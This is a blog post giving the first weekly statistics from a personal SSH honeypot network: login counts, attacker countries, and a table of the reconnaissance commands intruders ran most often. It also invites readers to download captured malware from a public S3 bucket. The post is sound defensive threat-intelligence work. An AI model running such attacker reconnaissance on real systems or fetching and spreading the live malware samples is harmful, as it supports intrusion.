Contents

The first HoneyPot Breakdown 13/09/2020

Contents

A quick introduction

I’ve been working on a neat side project for a while now, a global honeypot network I’m calling HoneypotDB. I have some previous posts around this project and I’m excited to announce that I’ll now be posting weekly analysis of trends and metrics collected by HoneypotDB, as well as a downloadable export of any malware upload to my pots!

My pots will automatically upload any new malware to S3 at 6PM every Sunday to https://hpdb-malware-drops.s3.amazonaws.com/index.html so feel free to poke around, this week’s batch is already in in!

Each pot will upload a zip file containing any files uploaded, downloaded or any stdout/stderr output from commands/scripts ran on the pot. A info.json file is also included with some metadata 👍

Honeypot Breakdown

The first breakdown provides a great baseline for future comparisons, with a total of 8 unique pots reporting from 6 global cities.

HoneypotDB has captured 148,767 unique SSH sessions this week, with a total of 148,228 failed SSH sessions, generating 154,259 login attempts of which 148,228 failed and 6,031 were successful (Any set of credentials are accepted after a random number of attempts).

This week, 4,186 unique usernames and 20,194 unique passwords were captured! I’m also planning on providing a list of call captured usernames and passwords as a downloadable list in a future update, so watch this space!

We’ve seen 110 unique counties attacking this week, from 4,503 different source IP addresses and 1,072 different IPSs. This metric to beat for unique software clients is 111.

3,821 unique commands have also been entered this week, with this week’s top 10 most common command being:

Command Count
uname -a 3,038
cat /proc/cpuinfo | grep name | wc -l 3,013
cat /proc/cpuinfo | grep name | head -n 1 | awk ‘{print $4,$5,$6,$7,$8,$9;}’ 3,011
free -m | grep Mem | awk ‘{print $2 ,$3, $4, $5, $6, $7}’ 3,010
ls -lh $(which ls) 3,009
which ls 3,009
crontab -l 3,008
w 3,007
cat /proc/cpuinfo | grep model | grep name | wc -l 3,006
uname -m 3,006

And finally, this week’s top attacker is, the USA 😲 followed closely by Russia and China.

Here is an overview of this week in pretty metrics 😀

/12-honeypot-breakdown-13092020/hpdb-breakdown-14092020.png
Honeypot Breakdown 14092020